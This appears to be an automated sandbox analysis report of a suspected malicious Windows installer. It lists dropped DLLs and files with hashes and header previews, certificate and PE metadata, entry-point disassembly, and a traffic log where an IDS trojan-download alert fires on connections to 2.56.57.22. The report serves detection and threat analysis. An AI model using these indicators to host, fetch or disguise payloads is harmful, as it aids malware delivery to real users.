                                                            SHA1:BDBBBFD1B3B2E8B2CCF368815DCF06247FC08C14
                                                            SHA-256:85C2314ECAA192D438DEBFAB7490E047C7780EB59A115DFEB68E36BF84CFAC22
                                                            SHA-512:42A6AC5750DC4F8D533AD03098348732519AE27C0EE002C4B5953205D5108EAE24C09BFFD587874FCB1DA422152A5B71DD778B58BFA760683C0A565B09C7F936
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                            • Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....+............" .........................................................0.......c....`.......................................................... ..P...............(<..............8............................................................................rdata..............................@..@.rsrc...P.... ......................@..@.....+..........T...8...8........+..........$...................8....rdata..8...x....rdata$zzzdbg.... ..0....rsrc$01....0!.. ....rsrc$02.... ....n->..;..^.....=1.[.$H.m...+..........................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):85509
                                                            Entropy (8bit):6.463912993297197
                                                            Encrypted:false
                                                            SSDEEP:1536:5qygxpRYb3MSYnrlZw4DLqn2l/G9jIJoHNAU4npu:2XAcSYnpZJ22dG9j6ONAUWu
                                                            MD5:B13B974324F63044A880BC84365A0BD0
                                                            SHA1:F7DABC096172A0A09C89628D830E067CC97A8E88
                                                            SHA-256:A34D0845D289E5A64498E4F6BF5A30A17C3F187FB292CCF5B1057D81D467E63D
                                                            SHA-512:B5B841042500D623161916CAD991A4F5561649BA14E609EF79958CAF4D7A95403190C187330330F10A1426F7AB9AFCA2B2ABEF9F1326580E57480D79408A455E
                                                            Malicious:false
                                                            Preview:....f.e.........7.B8C...................................................<....f.k.f.n.f.b..,..K"....................................................%.PO@.................................!..q.b...f...f.s.3.4...\OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!..r.o...........#.1d^..................................f..........!. .R.............................f...f.....f.c....#|.8;..................................f.t....c..b...k.]^.......................................f....3..Z.....................................................f.v..n......P..............................f.......... p.j&...........................................'r.............................d..r.........5...|...................................................&&/.s.M..f.f.......(.x.o.......................................g.......e....4w....................................................f.d.......0.Cs..........................................(.efQ...........................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):71280
                                                            Entropy (8bit):6.498681502225803
                                                            Encrypted:false
                                                            SSDEEP:1536:OOsuxD2ljgTCcxduILBZIdf7lgzd/I0bWBuMp/xj0:OMxyold9lZI7lOpI0bauH
                                                            MD5:BBA87C141D8F08D86033E05DAAC57D5D
                                                            SHA1:1EA5B7EE9B5C418FB4B15EE91F7524F5DB0D96D1
                                                            SHA-256:EFD311B206AB942C188C3F83AEBE13AEF1D475CB5D822CF3B70AB162DCDC6FF7
                                                            SHA-512:20581E2243E5FE63174EAB6A4424C6F3B06D5582984FBF35707C00813FF662F3232C06160A5365B14F1E7FD7D861CA1702B974B3C2D8DA5C3340D6588CA0C82C
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                            • Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....\............" ......................................................... ......W.....`...@......@............... ..................................L...d(..........p$......p.......T...........................................................P...H............text............................... ..`.data...............................@....reloc..p...........................@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........T.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...0.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):34
                                                            Entropy (8bit):4.256149238118269
                                                            Encrypted:false
                                                            SSDEEP:3:TFXV4ovxEun:Plv5n
                                                            MD5:CEA246A40ED9A68F27EEC9458A18DEEF
                                                            SHA1:3E210EBBD8F29926A51BA1074FAD9A22D53659D2
                                                            SHA-256:2F37518683B8AA7E7C81B0F07A42B2A2692CA32FE4DEEB6618470A5EB245B2EC
                                                            SHA-512:DD12CD2ECC855C0089E641986318FAF183E48798D5EE6F55BADF652186B8177D719FC2E631EF5C6353290827E96ADB59A715E3B82E956908D15012F01A91F9AB
                                                            Malicious:false
                                                            Preview:[Fortovsretter]..Tagged=SNIPPENS..
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):714072
                                                            Entropy (8bit):6.248486521119856
                                                            Encrypted:false
                                                            SSDEEP:12288:1nBVHwA0eIjodibcTTMIVNQdqu8JbHfySBpHdiChBA:FBVJVNQoL1
                                                            MD5:19ED470A232B01BB34B7F85288B017F0
                                                            SHA1:4AE08D71FB45055FCCB0D86174150082A39881F1
                                                            SHA-256:CF17BEE0C9479D7AAED9D3399E79FD89ED9535175C9AEEA73C54E48124D6C81A
                                                            SHA-512:5EBC96C5B13A0D79C0C149C59E30AFC28AECC0FBA543A018551A1F83CEE0111EABAED8400B92694739A3734BDE64F23334BBEAEE28AACBC99358CCA075C82682
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L,/B-B|B-B|B-B|..|G-B|..|k-B|..|.-B|..|.-B|B-C|(-B|.Z.|G-B|B-B|A-B|a.|.-B|$.|C-B|$.|C-B|RichB-B|................PE..L......V.........."!.....J...........o.......`...............................p............@......................... ...=... ..<.......................X3...0..P0..Pk..8...........................x...@............"..P............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data...@....`.......L..............@....idata....... .......h..............@....reloc...9...0...:...x..............@..B................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):585
                                                            Entropy (8bit):6.901794968845596
                                                            Encrypted:false
                                                            SSDEEP:12:6v/7X0Z7HBwN1+swFIzRqwnN14BZlEcFCF2BoCaTxT4:C0BqEWqQ8YGCgBoCaT14
                                                            MD5:1D98E1B2D84D7B9D0927F6B651EDE827
                                                            SHA1:A1F77FF7EC77865AEF6A4C1B64CC4E3C492090A5
                                                            SHA-256:A9109F45EFD9920700AAF489167AE647FB0BF88CE12AAF69502AD6D1505CB7B3
                                                            SHA-512:A13756009BC37481EBA3B8523EC0458A43459E34F8A81CFC924E20F9B7A68936DF4B321376B5C4DFE464E5AE403876EBB3CE96EE394C7BF1B46094CE9BC2E958
                                                            Malicious:false
                                                            Preview:.PNG........IHDR.............(-.S....sBIT.....O.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Folder Icons.._.....tEXtAuthor.Lapo Calamandrei..*...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb....~PLTE.........................................~...............................................................................l.....tRNS.@NS.................{IDAT.WU....0..#....9..!B...Aj)..Sv.,.....`....q..h..w..g..u.4X.x~...#S..d)...D..-W.[A4.ea...nf./.....`..|...W.}.e<.:\......~..%....IEND.B`.
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):40
                                                            Entropy (8bit):4.853055907333276
                                                            Encrypted:false
                                                            SSDEEP:3:rqh2mJUKMJjwD:raJ8JjI
                                                            MD5:6EA2EDF492D8337635DDCD02048BFA32
                                                            SHA1:3F86F5C6398972128ABD8822B5BD1BFE446C6517
                                                            SHA-256:35E1C059B4E54107456E898FBED2CFA59289F9272495014B4396C8ED427EBC95
                                                            SHA-512:56EC3DBDA7B837E26520F90E4D336FDB95D0789BE8A15E034526ED4553683E93F9C116FC57BCAC2C37DAEA516AFAC48CEE39F5BA6363415A4DA68806E1F6BAF9
                                                            Malicious:false
                                                            Preview:[ARBEJDSKLIMA]..Sporangia57=SPOTTEFUGL..
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):174600
                                                            Entropy (8bit):3.9275478025543364
                                                            Encrypted:false
                                                            SSDEEP:1536:lkoZp1DEqOBdglkr6myEGXRC5bWgiViQFpETgevYNBVe/d:qoZHq+4UXRC5b0ViQFpNQd
                                                            MD5:E10F0042C0EE3B2DE59BEC61D3811C6A
                                                            SHA1:0F75AEEE0338D2E563FD146847E21187C68FD75F
                                                            SHA-256:20DA8A600117A2ACC6A66AD493390D1DA3F8A9CC7FF13A8185EC02A0E5C93B2B
                                                            SHA-512:BA174D089A52135E9CEE8704749D9C44C4EC361C34E09C26CCFB4A34EB69590FCA77250E17B1ED68506B4C0EC958A2B17DED25741177D77CA68D05CDB1ED2FBC
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!......................................................................@.......................................... ..h................ ...........................................................................................rdata..p...........................@..@.rsrc...h.... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...d...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):225
                                                            Entropy (8bit):6.661593260259915
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPl9vt3lAnsrtxBllE+UwHndZxx3hYB84wXKYAIk9d0LPoBHlNHbEezI:6v/lhPysHUunYBcXKYA59dPFxRbZofp
                                                            MD5:E91514290CFC6F38580278374D3C6B0F
                                                            SHA1:068CB1200349717E8D2EE64475F480C850A85099
                                                            SHA-256:0DE516FC5D5A233BC240F055C70B004160CE4FA2364C93CC12D7D1A60C23420D
                                                            SHA-512:A6C1523D984857924FDDEFD48741B6FB552CAC220D53619F3E572799DACC0EE06B1FBF75D9CDC127BB685BADB4933FFD4F4923E341492307C55BE4C196510C57
                                                            Malicious:false
                                                            Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...?..A...O...V..D.t...8..Y.n....V.$......../..e...of.g.pm..pF(..,..Oq8.xb........~....$.]......y..".(..7.-.._....0...eUS.c..Y....}.J..p...M.....q=.=.B`....IEND.B`.
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):12288
                                                            Entropy (8bit):5.814115788739565
                                                            Encrypted:false
                                                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                            MD5:CFF85C549D536F651D4FB8387F1976F2
                                                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):243209
                                                            Entropy (8bit):5.969458574226536
                                                            Encrypted:false
                                                            SSDEEP:6144:RPVByzfb1YfMq48FKMqCQQU7k1TAH1OobTrEPvQvHk8hep:RPKqUjHM/PvQvHk8hep
                                                            MD5:2510EF915FD96CB0C5D947BA98CB751D
                                                            SHA1:AE10088DD6EC5BD0607FD5848A746AE57DCDC20E
                                                            SHA-256:02528C6E3F317B8FA9010BED22383D9BF696CC3DC9B97CC7FF81A445BE470FA1
                                                            SHA-512:ACA3ED02461EB0D70EF7BF5A74F1E9C7D20446349A02485A49BE3530F9C7CCEEE8F74A412FA8FD9002A815762F240C3C89AEACC97FF84130BE428F8C9ED73E05
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P.........C..............................0............`... .........................................V....................p..p............ ...............................T..(...................8................................text...............................`..`.data........ ......................@....rdata..`9...0...:..................@..@.pdata..p....p.......N..............@..@.xdata..\............f..............@..@.bss....P................................edata..V............~..............@..@.idata..............................@....CRT....X...........................@....tls................................@....reloc....... ......................@..B........................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.9195774738294356
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:SecuriteInfo.com.generic.ml.10062.exe
                                                            File size:1447056
                                                            MD5:95050a1e0c7d4c57f62e26967b3b0bfd
                                                            SHA1:baa57d1bf6d8a41ba89c6d09bfc4ec2bc986830c
                                                            SHA256:458597ef6835136826411179f244673d5b2702e906bedb3e470786eb455d98ce
                                                            SHA512:a659747a264aa16304d2d246faa277c415011ffd9c7376ac641a1193dc48c9efbbab745d9874a8aae8c4d53f050d32a2973633aab07618a2977e8502c4773549
                                                            SSDEEP:24576:4Y9Mbnf2fKJdodBzdf1JJNVwYFsTtflc4DJQCXzDt+Y9O1/euTLXwwUBg/:p9Mbnf8yeBzzJJe7FXzDtr0Pfwvq/
                                                            TLSH:8C65234D7B38D42BD1477B323D66CA3AADB4DA603565D75F728993EA0AE3305CD22230
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                            Icon Hash:38f8cecadad4cca2
                                                            Entrypoint:0x403640
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:61259b55b8912888e90f516ca08dc514
                                                            Signature Valid:false
                                                            Signature Issuer:CN=&#34;Brechernes6 originalbillederne Brazing Jagtdistrikter3 &#34;, O=Gennemloebe, L=Saint-Fr&#195;&#169;zal-d'Albuges, S=Occitanie, C=FR
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before, Not After
                                                            • 25/05/2022 17:12:28 25/05/2023 17:12:28
                                                            Subject Chain
                                                            • CN=&#34;Brechernes6 originalbillederne Brazing Jagtdistrikter3 &#34;, O=Gennemloebe, L=Saint-Fr&#195;&#169;zal-d'Albuges, S=Occitanie, C=FR
                                                            Version:3
                                                            Thumbprint MD5:8E7DC2F9F1AD6C2CDA6D266EDBD6ABFD
                                                            Thumbprint SHA-1:E691195416A055DD79B76CC251E1145D615EB842
                                                            Thumbprint SHA-256:F9208891F5FE35BC2ACD0351EC70F6955E51D254E0E594A885A216DFBEAFB35E
                                                            Serial:3583CC204911C9D6
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 000003F4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebx, ebx
                                                            push 00008001h
                                                            mov dword ptr [ebp-14h], ebx
                                                            mov dword ptr [ebp-04h], 0040A230h
                                                            mov dword ptr [ebp-10h], ebx
                                                            call dword ptr [004080C8h]
                                                            mov esi, dword ptr [004080CCh]
                                                            lea eax, dword ptr [ebp-00000140h]
                                                            push eax
                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                            mov dword ptr [ebp-2Ch], ebx
                                                            mov dword ptr [ebp-28h], ebx
                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                            call esi
                                                            test eax, eax
                                                            jne 00007FAD8CAF996Ah
                                                            lea eax, dword ptr [ebp-00000140h]
                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                            push eax
                                                            call esi
                                                            mov ax, word ptr [ebp-0000012Ch]
                                                            mov ecx, dword ptr [ebp-00000112h]
                                                            sub ax, 00000053h
                                                            add ecx, FFFFFFD0h
                                                            neg ax
                                                            sbb eax, eax
                                                            mov byte ptr [ebp-26h], 00000004h
                                                            not eax
                                                            and eax, ecx
                                                            mov word ptr [ebp-2Ch], ax
                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                            jnc 00007FAD8CAF993Ah
                                                            and word ptr [ebp-00000132h], 0000h
                                                            mov eax, dword ptr [ebp-00000134h]
                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                            mov dword ptr [0042A318h], eax
                                                            xor eax, eax
                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                            movzx eax, ax
                                                            or eax, ecx
                                                            xor ecx, ecx
                                                            mov ch, byte ptr [ebp-2Ch]
                                                            movzx ecx, cx
                                                            shl eax, 10h
                                                            or eax, ecx
                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b0000x22d68.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x15f5800x1f10
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                            .ndata0x2b0000x300000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .rsrc0x5b0000x22d680x22e00False0.596998207885data6.16097805989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountry
                                                            RT_ICON0x5b2f80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                            RT_ICON0x6bb200xd4b1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                            RT_ICON0x78fd80x25a8dataEnglishUnited States
                                                            RT_ICON0x7b5800x10a8dataEnglishUnited States
                                                            RT_ICON0x7c6280x988dataEnglishUnited States
                                                            RT_ICON0x7cfb00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                            RT_DIALOG0x7d4180x100dataEnglishUnited States
                                                            RT_DIALOG0x7d5180x11cdataEnglishUnited States
                                                            RT_DIALOG0x7d6380xc4dataEnglishUnited States
                                                            RT_DIALOG0x7d7000x60dataEnglishUnited States
                                                            RT_GROUP_ICON0x7d7600x5adataEnglishUnited States
                                                            RT_VERSION0x7d7c00x264dataEnglishUnited States
                                                            RT_MANIFEST0x7da280x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                            DLLImport
                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                            DescriptionData
                                                            LegalCopyrightMyotoniasgrupp96
                                                            FileVersion0.2.16
                                                            CompanyNamePARACHROMELI
                                                            LegalTrademarksbrnesa
                                                            Commentsansp
                                                            ProductNametomtersselv
                                                            FileDescriptionPolstrende
                                                            Translation0x0409 0x04b0
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.11.202.56.57.2249763802018752 05/25/22-22:44:01.684322TCP2018752ET TROJAN Generic .bin download from Dotted Quad4976380192.168.11.202.56.57.22
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 25, 2022 22:44:01.665100098 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.683654070 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.683852911 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.684322119 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.702908993 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.702997923 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703053951 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.703083038 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703131914 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703178883 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703224897 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703269958 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703285933 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.703334093 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703356981 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.703396082 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703428984 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.703459978 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.703500986 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.703644991 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756292105 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756356001 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756403923 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756457090 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756465912 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756513119 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756586075 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756611109 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756664991 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756711960 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756767035 CEST80497632.56.57.22192.168.11.20
